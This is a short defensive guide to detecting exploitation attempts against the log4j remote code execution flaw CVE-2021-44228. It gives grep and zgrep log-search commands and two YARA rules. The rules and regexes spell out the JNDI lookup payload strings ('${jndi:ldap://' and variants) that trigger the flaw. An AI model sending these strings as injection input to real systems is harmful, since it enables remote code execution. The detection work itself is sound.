# log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

## Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder `/var/log` and all sub folders

```bash
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://[^\n]+' /var/log
```

This command searches for exploitation attempts in compressed files in folder `/var/log` and all sub folders

```bash
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi)://[^\n]+'
```

## YARA

Preliminary YARA rules (work in progress)
```yara
rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
   meta:
      description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 60
   strings:
      $x1 = "${jndi:ldap://"
      $x2 = "${jndi:rmi://"
      $x3 = "${jndi:ldaps://"
   condition:
      1 of them
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
   meta:
      description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 80
   strings:
      $x1 = /\$\{jndi:(ldap|ldaps|rmi):\/\/[a-z-\.0-9]{3,42}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
      $fp1 = "ldap://127.0.0.1"
      $fp2 = "ldaps://127.0.0.1"
      $fp3 = "rmi://127.0.0.1"
   condition:
      $x1 and not 1 of ($fp*)
}
```

## Credits 

I got help and ideas from 

- @matthias_kaiser 
- [@daphiel](https://twitter.com/daphiel)